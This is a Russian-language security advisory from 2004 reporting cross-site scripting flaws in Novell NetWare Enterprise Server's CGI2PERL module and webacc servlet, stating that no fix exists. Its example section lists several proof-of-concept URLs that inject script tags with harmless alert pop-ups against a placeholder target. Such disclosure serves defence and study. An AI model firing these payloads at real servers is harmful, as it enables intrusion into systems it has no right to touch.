Межсайтовый скриптинг в NetWare Enterprise Server
| Дата публикации: | 27.01.2004 |
| Всего просмотров: | 1120 |
| Опасность: | Низкая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: NetWare Enterprise Server
Описание: Уязвимость обнаружена в NetWare Enterprise Server в модуле CGI2PERL. Удаленный пользователь может выполнить XSS нападение. Пример/Эксплоит:
http://[target]/perl/\<sCRIPT>alert("d")</sCR IPT>\.pl
http://[target]/perl/<script>alert('XSS')</script>.pl
http://[target]/servlet/webacc?User.id="><script>alert('XSS')</script>
http://[target]/servlet/web acc?User.id=&User.password=&User.context=cwqlNomoqd
Oq&User.interface=frames&error=login&merge=webacc&action=User.Login&GWAP.ver
sion="><script>alert('XSS')</script>
http://[target]/nsn/"<script%20language=vbscript>msgbox%20sadas</script>".bas
URL производителя: http://www.novell.com Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | NetWare-Enterprise-Web-Server/5.1/6.0 Multiple Vulnerabilities |